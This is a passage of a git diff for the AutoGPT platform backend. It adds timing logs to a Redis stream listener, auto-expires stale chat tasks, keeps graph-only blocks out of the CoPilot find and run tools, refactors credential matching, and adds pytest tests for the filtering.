+        log_meta = {"component": "StreamRegistry", "task_id": task_id}
+
+    logger.info(
+        f"[TIMING] _stream_listener STARTED, task={task_id}, last_id={last_replayed_id}",
+        extra={"json_fields": {**log_meta, "last_replayed_id": last_replayed_id}},
+    )
+
    queue_id = id(subscriber_queue)
    # Track the last successfully delivered message ID for recovery hints
    last_delivered_id = last_replayed_id
+    messages_delivered = 0
+    first_message_time = None
+    xread_count = 0

    try:
        redis = await get_redis_async()
@@ -287,9 +453,39 @@ async def _stream_listener(
        while True:
            # Block for up to 30 seconds waiting for new messages
            # This allows periodic checking if task is still running
+            xread_start = time.perf_counter()
+            xread_count += 1
            messages = await redis.xread(
                {stream_key: current_id}, block=30000, count=100
            )
+            xread_time = (time.perf_counter() - xread_start) * 1000
+
+            if messages:
+                msg_count = sum(len(msgs) for _, msgs in messages)
+                logger.info(
+                    f"[TIMING] xread #{xread_count} returned {msg_count} messages in {xread_time:.1f}ms",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "xread_count": xread_count,
+                            "n_messages": msg_count,
+                            "duration_ms": xread_time,
+                        }
+                    },
+                )
+            elif xread_time > 1000:
+                # Only log timeouts (30s blocking)
+                logger.info(
+                    f"[TIMING] xread #{xread_count} timeout after {xread_time:.1f}ms",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "xread_count": xread_count,
+                            "duration_ms": xread_time,
+                            "reason": "timeout",
+                        }
+                    },
+                )

            if not messages:
                # Timeout - check if task is still running
@@ -326,10 +522,30 @@ async def _stream_listener(
                                )
                                # Update last delivered ID on successful delivery
                                last_delivered_id = current_id
+                                messages_delivered += 1
+                                if first_message_time is None:
+                                    first_message_time = time.perf_counter()
+                                    elapsed = (first_message_time - start_time) * 1000
+                                    logger.info(
+                                        f"[TIMING] FIRST live message at {elapsed:.1f}ms, type={type(chunk).__name__}",
+                                        extra={
+                                            "json_fields": {
+                                                **log_meta,
+                                                "elapsed_ms": elapsed,
+                                                "chunk_type": type(chunk).__name__,
+                                            }
+                                        },
+                                    )
                            except asyncio.TimeoutError:
                                logger.warning(
-                                    f"Subscriber queue full for task {task_id}, "
-                                    f"message delivery timed out after {QUEUE_PUT_TIMEOUT}s"
+                                    f"[TIMING] Subscriber queue full, delivery timed out after {QUEUE_PUT_TIMEOUT}s",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "timeout_s": QUEUE_PUT_TIMEOUT,
+                                            "reason": "queue_full",
+                                        }
+                                    },
                                )
                                # Send overflow error with recovery info
                                try:
@@ -351,15 +567,44 @@ async def _stream_listener(

                            # Stop listening on finish
                            if isinstance(chunk, StreamFinish):
+                                total_time = (time.perf_counter() - start_time) * 1000
+                                logger.info(
+                                    f"[TIMING] StreamFinish received in {total_time/1000:.1f}s; delivered={messages_delivered}",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "total_time_ms": total_time,
+                                            "messages_delivered": messages_delivered,
+                                        }
+                                    },
+                                )
                                return
                    except Exception as e:
-                        logger.warning(f"Error processing stream message: {e}")
+                        logger.warning(
+                            f"Error processing stream message: {e}",
+                            extra={"json_fields": {**log_meta, "error": str(e)}},
+                        )

    except asyncio.CancelledError:
-        logger.debug(f"Stream listener cancelled for task {task_id}")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] _stream_listener CANCELLED after {elapsed:.1f}ms, delivered={messages_delivered}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "elapsed_ms": elapsed,
+                    "messages_delivered": messages_delivered,
+                    "reason": "cancelled",
+                }
+            },
+        )
        raise  # Re-raise to propagate cancellation
    except Exception as e:
-        logger.error(f"Stream listener error for task {task_id}: {e}")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.error(
+            f"[TIMING] _stream_listener ERROR after {elapsed:.1f}ms: {e}",
+            extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
+        )
        # On error, send finish to unblock subscriber
        try:
            await asyncio.wait_for(
@@ -368,10 +613,24 @@ async def _stream_listener(
            )
        except (asyncio.TimeoutError, asyncio.QueueFull):
            logger.warning(
-                f"Could not deliver finish event for task {task_id} after error"
+                "Could not deliver finish event after error",
+                extra={"json_fields": log_meta},
            )
    finally:
        # Clean up listener task mapping on exit
+        total_time = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] _stream_listener FINISHED in {total_time/1000:.1f}s; task={task_id}, "
+            f"delivered={messages_delivered}, xread_count={xread_count}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "total_time_ms": total_time,
+                    "messages_delivered": messages_delivered,
+                    "xread_count": xread_count,
+                }
+            },
+        )
        _listener_tasks.pop(queue_id, None)


@@ -555,6 +814,28 @@ async def get_active_task_for_session(
                if task_user_id and user_id != task_user_id:
                    continue

+                # Auto-expire stale tasks that exceeded stream_timeout
+                created_at_str = meta.get("created_at", "")
+                if created_at_str:
+                    try:
+                        created_at = datetime.fromisoformat(created_at_str)
+                        age_seconds = (
+                            datetime.now(timezone.utc) - created_at
+                        ).total_seconds()
+                        if age_seconds > config.stream_timeout:
+                            logger.warning(
+                                f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
+                                f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
+                            )
+                            await mark_task_completed(task_id, "failed")
+                            continue
+                    except (ValueError, TypeError):
+                        pass
+
+                logger.info(
+                    f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
+                )
+
                # Get the last message ID from Redis Stream
                stream_key = _get_task_stream_key(task_id)
                last_id = "0-0"
@@ -598,8 +879,10 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
        ResponseType,
        StreamError,
        StreamFinish,
+        StreamFinishStep,
        StreamHeartbeat,
        StreamStart,
+        StreamStartStep,
        StreamTextDelta,
        StreamTextEnd,
        StreamTextStart,
@@ -613,6 +896,8 @@ def _reconstruct_chunk(chunk_data: dict) -> StreamBaseResponse | None:
    type_to_class: dict[str, type[StreamBaseResponse]] = {
        ResponseType.START.value: StreamStart,
        ResponseType.FINISH.value: StreamFinish,
+        ResponseType.START_STEP.value: StreamStartStep,
+        ResponseType.FINISH_STEP.value: StreamFinishStep,
        ResponseType.TEXT_START.value: StreamTextStart,
        ResponseType.TEXT_DELTA.value: StreamTextDelta,
        ResponseType.TEXT_END.value: StreamTextEnd,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
@@ -13,10 +13,32 @@ from backend.api.features.chat.tools.models import (
    NoResultsResponse,
 )
 from backend.api.features.store.hybrid_search import unified_hybrid_search
-from backend.data.block import get_block
+from backend.data.block import BlockType, get_block

 logger = logging.getLogger(__name__)

+_TARGET_RESULTS = 10
+# Over-fetch to compensate for post-hoc filtering of graph-only blocks.
+# 40 is 2x current removed; speed of query 10 vs 40 is minimial
+_OVERFETCH_PAGE_SIZE = 40
+
+# Block types that only work within graphs and cannot run standalone in CoPilot.
+COPILOT_EXCLUDED_BLOCK_TYPES = {
+    BlockType.INPUT,  # Graph interface definition - data enters via chat, not graph inputs
+    BlockType.OUTPUT,  # Graph interface definition - data exits via chat, not graph outputs
+    BlockType.WEBHOOK,  # Wait for external events - would hang forever in CoPilot
+    BlockType.WEBHOOK_MANUAL,  # Same as WEBHOOK
+    BlockType.NOTE,  # Visual annotation only - no runtime behavior
+    BlockType.HUMAN_IN_THE_LOOP,  # Pauses for human approval - CoPilot IS human-in-the-loop
+    BlockType.AGENT,  # AgentExecutorBlock requires execution_context - use run_agent tool
+}
+
+# Specific block IDs excluded from CoPilot (STANDARD type but still require graph context)
+COPILOT_EXCLUDED_BLOCK_IDS = {
+    # SmartDecisionMakerBlock - dynamically discovers downstream blocks via graph topology
+    "3b191d9f-356f-482d-8238-ba04b6d18381",
+}
+

 class FindBlockTool(BaseTool):
    """Tool for searching available blocks."""
@@ -88,7 +110,7 @@ class FindBlockTool(BaseTool):
                query=query,
                content_types=[ContentType.BLOCK],
                page=1,
-                page_size=10,
+                page_size=_OVERFETCH_PAGE_SIZE,
            )

            if not results:
@@ -108,60 +130,90 @@ class FindBlockTool(BaseTool):
                block = get_block(block_id)

                # Skip disabled blocks
-                if block and not block.disabled:
-                    # Get input/output schemas
-                    input_schema = {}
-                    output_schema = {}
-                    try:
-                        input_schema = block.input_schema.jsonschema()
-                    except Exception:
-                        pass
-                    try:
-                        output_schema = block.output_schema.jsonschema()
-                    except Exception:
-                        pass
+                if not block or block.disabled:
+                    continue

-                    # Get categories from block instance
-                    categories = []
-                    if hasattr(block, "categories") and block.categories:
-                        categories = [cat.value for cat in block.categories]
+                # Skip blocks excluded from CoPilot (graph-only blocks)
+                if (
+                    block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
+                    or block.id in COPILOT_EXCLUDED_BLOCK_IDS
+                ):
+                    continue

-                    # Extract required inputs for easier use
-                    required_inputs: list[BlockInputFieldInfo] = []
-                    if input_schema:
-                        properties = input_schema.get("properties", {})
-                        required_fields = set(input_schema.get("required", []))
-                        # Get credential field names to exclude from required inputs
-                        credentials_fields = set(
-                            block.input_schema.get_credentials_fields().keys()
-                        )
-
-                        for field_name, field_schema in properties.items():
-                            # Skip credential fields - they're handled separately
-                            if field_name in credentials_fields:
-                                continue
-
-                            required_inputs.append(
-                                BlockInputFieldInfo(
-                                    name=field_name,
-                                    type=field_schema.get("type", "string"),
-                                    description=field_schema.get("description", ""),
-                                    required=field_name in required_fields,
-                                    default=field_schema.get("default"),
-                                )
-                            )
-
-                    blocks.append(
-                        BlockInfoSummary(
-                            id=block_id,
-                            name=block.name,
-                            description=block.description or "",
-                            categories=categories,
-                            input_schema=input_schema,
-                            output_schema=output_schema,
-                            required_inputs=required_inputs,
-                        )
+                # Get input/output schemas
+                input_schema = {}
+                output_schema = {}
+                try:
+                    input_schema = block.input_schema.jsonschema()
+                except Exception as e:
+                    logger.debug(
+                        "Failed to generate input schema for block %s: %s",
+                        block_id,
+                        e,
                    )
+                try:
+                    output_schema = block.output_schema.jsonschema()
+                except Exception as e:
+                    logger.debug(
+                        "Failed to generate output schema for block %s: %s",
+                        block_id,
+                        e,
+                    )
+
+                # Get categories from block instance
+                categories = []
+                if hasattr(block, "categories") and block.categories:
+                    categories = [cat.value for cat in block.categories]
+
+                # Extract required inputs for easier use
+                required_inputs: list[BlockInputFieldInfo] = []
+                if input_schema:
+                    properties = input_schema.get("properties", {})
+                    required_fields = set(input_schema.get("required", []))
+                    # Get credential field names to exclude from required inputs
+                    credentials_fields = set(
+                        block.input_schema.get_credentials_fields().keys()
+                    )
+
+                    for field_name, field_schema in properties.items():
+                        # Skip credential fields - they're handled separately
+                        if field_name in credentials_fields:
+                            continue
+
+                        required_inputs.append(
+                            BlockInputFieldInfo(
+                                name=field_name,
+                                type=field_schema.get("type", "string"),
+                                description=field_schema.get("description", ""),
+                                required=field_name in required_fields,
+                                default=field_schema.get("default"),
+                            )
+                        )
+
+                blocks.append(
+                    BlockInfoSummary(
+                        id=block_id,
+                        name=block.name,
+                        description=block.description or "",
+                        categories=categories,
+                        input_schema=input_schema,
+                        output_schema=output_schema,
+                        required_inputs=required_inputs,
+                    )
+                )
+
+                if len(blocks) >= _TARGET_RESULTS:
+                    break
+
+            if blocks and len(blocks) < _TARGET_RESULTS:
+                logger.debug(
+                    "find_block returned %d/%d results for query '%s' "
+                    "(filtered %d excluded/disabled blocks)",
+                    len(blocks),
+                    _TARGET_RESULTS,
+                    query,
+                    len(results) - len(blocks),
+                )

            if not blocks:
                return NoResultsResponse(
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
@@ -0,0 +1,139 @@
+"""Tests for block filtering in FindBlockTool."""
+
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from backend.api.features.chat.tools.find_block import (
+    COPILOT_EXCLUDED_BLOCK_IDS,
+    COPILOT_EXCLUDED_BLOCK_TYPES,
+    FindBlockTool,
+)
+from backend.api.features.chat.tools.models import BlockListResponse
+from backend.data.block import BlockType
+
+from ._test_data import make_session
+
+_TEST_USER_ID = "test-user-find-block"
+
+
+def make_mock_block(
+    block_id: str, name: str, block_type: BlockType, disabled: bool = False
+):
+    """Create a mock block for testing."""
+    mock = MagicMock()
+    mock.id = block_id
+    mock.name = name
+    mock.description = f"{name} description"
+    mock.block_type = block_type
+    mock.disabled = disabled
+    mock.input_schema = MagicMock()
+    mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
+    mock.input_schema.get_credentials_fields.return_value = {}
+    mock.output_schema = MagicMock()
+    mock.output_schema.jsonschema.return_value = {}
+    mock.categories = []
+    return mock
+
+
+class TestFindBlockFiltering:
+    """Tests for block filtering in FindBlockTool."""
+
+    def test_excluded_block_types_contains_expected_types(self):
+        """Verify COPILOT_EXCLUDED_BLOCK_TYPES contains all graph-only types."""
+        assert BlockType.INPUT in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.OUTPUT in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.WEBHOOK in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.WEBHOOK_MANUAL in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.NOTE in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.HUMAN_IN_THE_LOOP in COPILOT_EXCLUDED_BLOCK_TYPES
+        assert BlockType.AGENT in COPILOT_EXCLUDED_BLOCK_TYPES
+
+    def test_excluded_block_ids_contains_smart_decision_maker(self):
+        """Verify SmartDecisionMakerBlock is in COPILOT_EXCLUDED_BLOCK_IDS."""
+        assert "3b191d9f-356f-482d-8238-ba04b6d18381" in COPILOT_EXCLUDED_BLOCK_IDS
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_type_filtered_from_results(self):
+        """Verify blocks with excluded BlockTypes are filtered from search results."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        # Mock search returns an INPUT block (excluded) and a STANDARD block (included)
+        search_results = [
+            {"content_id": "input-block-id", "score": 0.9},
+            {"content_id": "standard-block-id", "score": 0.8},
+        ]
+
+        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
+        standard_block = make_mock_block(
+            "standard-block-id", "HTTP Request", BlockType.STANDARD
+        )
+
+        def mock_get_block(block_id):
+            return {
+                "input-block-id": input_block,
+                "standard-block-id": standard_block,
+            }.get(block_id)
+
+        with patch(
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
+            new_callable=AsyncMock,
+            return_value=(search_results, 2),
+        ):
+            with patch(
+                "backend.api.features.chat.tools.find_block.get_block",
+                side_effect=mock_get_block,
+            ):
+                tool = FindBlockTool()
+                response = await tool._execute(
+                    user_id=_TEST_USER_ID, session=session, query="test"
+                )
+
+        # Should only return the standard block, not the INPUT block
+        assert isinstance(response, BlockListResponse)
+        assert len(response.blocks) == 1
+        assert response.blocks[0].id == "standard-block-id"
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_id_filtered_from_results(self):
+        """Verify SmartDecisionMakerBlock is filtered from search results."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
+        search_results = [
+            {"content_id": smart_decision_id, "score": 0.9},
+            {"content_id": "normal-block-id", "score": 0.8},
+        ]
+
+        # SmartDecisionMakerBlock has STANDARD type but is excluded by ID
+        smart_block = make_mock_block(
+            smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
+        )
+        normal_block = make_mock_block(
+            "normal-block-id", "Normal Block", BlockType.STANDARD
+        )
+
+        def mock_get_block(block_id):
+            return {
+                smart_decision_id: smart_block,
+                "normal-block-id": normal_block,
+            }.get(block_id)
+
+        with patch(
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
+            new_callable=AsyncMock,
+            return_value=(search_results, 2),
+        ):
+            with patch(
+                "backend.api.features.chat.tools.find_block.get_block",
+                side_effect=mock_get_block,
+            ):
+                tool = FindBlockTool()
+                response = await tool._execute(
+                    user_id=_TEST_USER_ID, session=session, query="decision"
+                )
+
+        # Should only return normal block, not SmartDecisionMakerBlock
+        assert isinstance(response, BlockListResponse)
+        assert len(response.blocks) == 1
+        assert response.blocks[0].id == "normal-block-id"
--- a/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
@@ -0,0 +1,29 @@
+"""Shared helpers for chat tools."""
+
+from typing import Any
+
+
+def get_inputs_from_schema(
+    input_schema: dict[str, Any],
+    exclude_fields: set[str] | None = None,
+) -> list[dict[str, Any]]:
+    """Extract input field info from JSON schema."""
+    if not isinstance(input_schema, dict):
+        return []
+
+    exclude = exclude_fields or set()
+    properties = input_schema.get("properties", {})
+    required = set(input_schema.get("required", []))
+
+    return [
+        {
+            "name": name,
+            "title": schema.get("title", name),
+            "type": schema.get("type", "string"),
+            "description": schema.get("description", ""),
+            "required": name in required,
+            "default": schema.get("default"),
+        }
+        for name, schema in properties.items()
+        if name not in exclude
+    ]
--- a/autogpt_platform/backend/backend/api/features/chat/tools/models.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/models.py
@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
    name: str
    description: str
    categories: list[str]
-    input_schema: dict[str, Any]
-    output_schema: dict[str, Any]
+    input_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block inputs",
+    )
+    output_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block outputs",
+    )
    required_inputs: list[BlockInputFieldInfo] = Field(
        default_factory=list,
-        description="List of required input fields for this block",
+        description="List of input fields for this block",
    )


@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
    query: str
    usage_hint: str = Field(
        default="To execute a block, call run_block with block_id set to the block's "
-        "'id' field and input_data containing the required fields from input_schema."
+        "'id' field and input_data containing the fields listed in required_inputs."
    )


--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
@@ -24,6 +24,7 @@ from backend.util.timezone_utils import (
 )

 from .base import BaseTool
+from .helpers import get_inputs_from_schema
 from .models import (
    AgentDetails,
    AgentDetailsResponse,
@@ -261,7 +262,7 @@ class RunAgentTool(BaseTool):
                        ),
                        requirements={
                            "credentials": requirements_creds_list,
-                            "inputs": self._get_inputs_list(graph.input_schema),
+                            "inputs": get_inputs_from_schema(graph.input_schema),
                            "execution_modes": self._get_execution_modes(graph),
                        },
                    ),
@@ -369,22 +370,6 @@ class RunAgentTool(BaseTool):
                session_id=session_id,
            )

-    def _get_inputs_list(self, input_schema: dict[str, Any]) -> list[dict[str, Any]]:
-        """Extract inputs list from schema."""
-        inputs_list = []
-        if isinstance(input_schema, dict) and "properties" in input_schema:
-            for field_name, field_schema in input_schema["properties"].items():
-                inputs_list.append(
-                    {
-                        "name": field_name,
-                        "title": field_schema.get("title", field_name),
-                        "type": field_schema.get("type", "string"),
-                        "description": field_schema.get("description", ""),
-                        "required": field_name in input_schema.get("required", []),
-                    }
-                )
-        return inputs_list
-
    def _get_execution_modes(self, graph: GraphModel) -> list[str]:
        """Get available execution modes for the graph."""
        trigger_info = graph.trigger_setup_info
@@ -398,7 +383,7 @@ class RunAgentTool(BaseTool):
        suffix: str,
    ) -> str:
        """Build a message describing available inputs for an agent."""
-        inputs_list = self._get_inputs_list(graph.input_schema)
+        inputs_list = get_inputs_from_schema(graph.input_schema)
        required_names = [i["name"] for i in inputs_list if i["required"]]
        optional_names = [i["name"] for i in inputs_list if not i["required"]]

--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
@@ -8,14 +8,19 @@ from typing import Any
 from pydantic_core import PydanticUndefined

 from backend.api.features.chat.model import ChatSession
-from backend.data.block import get_block
+from backend.api.features.chat.tools.find_block import (
+    COPILOT_EXCLUDED_BLOCK_IDS,
+    COPILOT_EXCLUDED_BLOCK_TYPES,
+)
+from backend.data.block import AnyBlockSchema, get_block
 from backend.data.execution import ExecutionContext
-from backend.data.model import CredentialsMetaInput
+from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
 from backend.data.workspace import get_or_create_workspace
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.util.exceptions import BlockError

 from .base import BaseTool
+from .helpers import get_inputs_from_schema
 from .models import (
    BlockOutputResponse,
    ErrorResponse,
@@ -24,7 +29,10 @@ from .models import (
    ToolResponseBase,
    UserReadiness,
 )
-from .utils import build_missing_credentials_from_field_info
+from .utils import (
+    build_missing_credentials_from_field_info,
+    match_credentials_to_requirements,
+)

 logger = logging.getLogger(__name__)

@@ -73,91 +81,6 @@ class RunBlockTool(BaseTool):
    def requires_auth(self) -> bool:
        return True

-    async def _check_block_credentials(
-        self,
-        user_id: str,
-        block: Any,
-        input_data: dict[str, Any] | None = None,
-    ) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
-        """
-        Check if user has required credentials for a block.
-
-        Args:
-            user_id: User ID
-            block: Block to check credentials for
-            input_data: Input data for the block (used to determine provider via discriminator)
-
-        Returns:
-            tuple[matched_credentials, missing_credentials]
-        """
-        matched_credentials: dict[str, CredentialsMetaInput] = {}
-        missing_credentials: list[CredentialsMetaInput] = []
-        input_data = input_data or {}
-
-        # Get credential field info from block's input schema
-        credentials_fields_info = block.input_schema.get_credentials_fields_info()
-
-        if not credentials_fields_info:
-            return matched_credentials, missing_credentials
-
-        # Get user's available credentials
-        creds_manager = IntegrationCredentialsManager()
-        available_creds = await creds_manager.store.get_all_creds(user_id)
-
-        for field_name, field_info in credentials_fields_info.items():
-            effective_field_info = field_info
-            if field_info.discriminator and field_info.discriminator_mapping:
-                # Get discriminator from input, falling back to schema default
-                discriminator_value = input_data.get(field_info.discriminator)
-                if discriminator_value is None:
-                    field = block.input_schema.model_fields.get(
-                        field_info.discriminator
-                    )
-                    if field and field.default is not PydanticUndefined:
-                        discriminator_value = field.default
-
-                if (
-                    discriminator_value
-                    and discriminator_value in field_info.discriminator_mapping
-                ):
-                    effective_field_info = field_info.discriminate(discriminator_value)
-                    logger.debug(
-                        f"Discriminated provider for {field_name}: "
-                        f"{discriminator_value} -> {effective_field_info.provider}"
-                    )
-
-            matching_cred = next(
-                (
-                    cred
-                    for cred in available_creds
-                    if cred.provider in effective_field_info.provider
-                    and cred.type in effective_field_info.supported_types
-                ),
-                None,
-            )
-
-            if matching_cred:
-                matched_credentials[field_name] = CredentialsMetaInput(
-                    id=matching_cred.id,
-                    provider=matching_cred.provider,  # type: ignore
-                    type=matching_cred.type,
-                    title=matching_cred.title,
-                )
-            else:
-                # Create a placeholder for the missing credential
-                provider = next(iter(effective_field_info.provider), "unknown")
-                cred_type = next(iter(effective_field_info.supported_types), "api_key")
-                missing_credentials.append(
-                    CredentialsMetaInput(
-                        id=field_name,
-                        provider=provider,  # type: ignore
-                        type=cred_type,  # type: ignore
-                        title=field_name.replace("_", " ").title(),
-                    )
-                )
-
-        return matched_credentials, missing_credentials
-
    async def _execute(
        self,
        user_id: str | None,
@@ -212,11 +135,24 @@ class RunBlockTool(BaseTool):
                session_id=session_id,
            )

+        # Check if block is excluded from CoPilot (graph-only blocks)
+        if (
+            block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
+            or block.id in COPILOT_EXCLUDED_BLOCK_IDS
+        ):
+            return ErrorResponse(
+                message=(
+                    f"Block '{block.name}' cannot be run directly in CoPilot. "
+                    "This block is designed for use within graphs only."
+                ),
+                session_id=session_id,
+            )
+
        logger.info(f"Executing block {block.name} ({block_id}) for user {user_id}")

        creds_manager = IntegrationCredentialsManager()
-        matched_credentials, missing_credentials = await self._check_block_credentials(
-            user_id, block, input_data
+        matched_credentials, missing_credentials = (
+            await self._resolve_block_credentials(user_id, block, input_data)
        )

        if missing_credentials:
@@ -345,29 +281,75 @@ class RunBlockTool(BaseTool):
                session_id=session_id,
            )

-    def _get_inputs_list(self, block: Any) -> list[dict[str, Any]]:
+    async def _resolve_block_credentials(
+        self,
+        user_id: str,
+        block: AnyBlockSchema,
+        input_data: dict[str, Any] | None = None,
+    ) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
+        """
+        Resolve credentials for a block by matching user's available credentials.
+
+        Args:
+            user_id: User ID
+            block: Block to resolve credentials for
+            input_data: Input data for the block (used to determine provider via discriminator)
+
+        Returns:
+            tuple of (matched_credentials, missing_credentials) - matched credentials
+            are used for block execution, missing ones indicate setup requirements.
+        """
+        input_data = input_data or {}
+        requirements = self._resolve_discriminated_credentials(block, input_data)
+
+        if not requirements:
+            return {}, []
+
+        return await match_credentials_to_requirements(user_id, requirements)
+
+    def _get_inputs_list(self, block: AnyBlockSchema) -> list[dict[str, Any]]:
        """Extract non-credential inputs from block schema."""
-        inputs_list = []
        schema = block.input_schema.jsonschema()
-        properties = schema.get("properties", {})
-        required_fields = set(schema.get("required", []))
-
-        # Get credential field names to exclude
        credentials_fields = set(block.input_schema.get_credentials_fields().keys())
+        return get_inputs_from_schema(schema, exclude_fields=credentials_fields)

-        for field_name, field_schema in properties.items():
-            # Skip credential fields
-            if field_name in credentials_fields:
-                continue
+    def _resolve_discriminated_credentials(
+        self,
+        block: AnyBlockSchema,
+        input_data: dict[str, Any],
+    ) -> dict[str, CredentialsFieldInfo]:
+        """Resolve credential requirements, applying discriminator logic where needed."""
+        credentials_fields_info = block.input_schema.get_credentials_fields_info()
+        if not credentials_fields_info:
+            return {}

-            inputs_list.append(
-                {
-                    "name": field_name,
-                    "title": field_schema.get("title", field_name),
-                    "type": field_schema.get("type", "string"),
-                    "description": field_schema.get("description", ""),
-                    "required": field_name in required_fields,
-                }
-            )
+        resolved: dict[str, CredentialsFieldInfo] = {}

-        return inputs_list
+        for field_name, field_info in credentials_fields_info.items():
+            effective_field_info = field_info
+
+            if field_info.discriminator and field_info.discriminator_mapping:
+                discriminator_value = input_data.get(field_info.discriminator)
+                if discriminator_value is None:
+                    field = block.input_schema.model_fields.get(
+                        field_info.discriminator
+                    )
+                    if field and field.default is not PydanticUndefined:
+                        discriminator_value = field.default
+
+                if (
+                    discriminator_value
+                    and discriminator_value in field_info.discriminator_mapping
+                ):
+                    effective_field_info = field_info.discriminate(discriminator_value)
+                    # For host-scoped credentials, add the discriminator value
+                    # (e.g., URL) so _credential_is_for_host can match it
+                    effective_field_info.discriminator_values.add(discriminator_value)
+                    logger.debug(
+                        f"Discriminated provider for {field_name}: "
+                        f"{discriminator_value} -> {effective_field_info.provider}"
+                    )
+
+            resolved[field_name] = effective_field_info
+
+        return resolved
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
@@ -0,0 +1,106 @@
+"""Tests for block execution guards in RunBlockTool."""
+
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from backend.api.features.chat.tools.models import ErrorResponse
+from backend.api.features.chat.tools.run_block import RunBlockTool
+from backend.data.block import BlockType
+
+from ._test_data import make_session
+
+_TEST_USER_ID = "test-user-run-block"
+
+
+def make_mock_block(
+    block_id: str, name: str, block_type: BlockType, disabled: bool = False
+):
+    """Create a mock block for testing."""
+    mock = MagicMock()
+    mock.id = block_id
+    mock.name = name
+    mock.block_type = block_type
+    mock.disabled = disabled
+    mock.input_schema = MagicMock()
+    mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
+    mock.input_schema.get_credentials_fields_info.return_value = []
+    return mock
+
+
+class TestRunBlockFiltering:
+    """Tests for block execution guards in RunBlockTool."""
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_type_returns_error(self):
+        """Attempting to execute a block with excluded BlockType returns error."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=input_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
+                block_id="input-block-id",
+                input_data={},
+            )
+
+        assert isinstance(response, ErrorResponse)
+        assert "cannot be run directly in CoPilot" in response.message
+        assert "designed for use within graphs only" in response.message
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_excluded_block_id_returns_error(self):
+        """Attempting to execute SmartDecisionMakerBlock returns error."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
+        smart_block = make_mock_block(
+            smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
+        )
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=smart_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
+                block_id=smart_decision_id,
+                input_data={},
+            )
+
+        assert isinstance(response, ErrorResponse)
+        assert "cannot be run directly in CoPilot" in response.message
+
+    @pytest.mark.asyncio(loop_scope="session")
+    async def test_non_excluded_block_passes_guard(self):
+        """Non-excluded blocks pass the filtering guard (may fail later for other reasons)."""
+        session = make_session(user_id=_TEST_USER_ID)
+
+        standard_block = make_mock_block(
+            "standard-id", "HTTP Request", BlockType.STANDARD
+        )
+
+        with patch(
+            "backend.api.features.chat.tools.run_block.get_block",
+            return_value=standard_block,
+        ):
+            tool = RunBlockTool()
+            response = await tool._execute(
+                user_id=_TEST_USER_ID,
+                session=session,
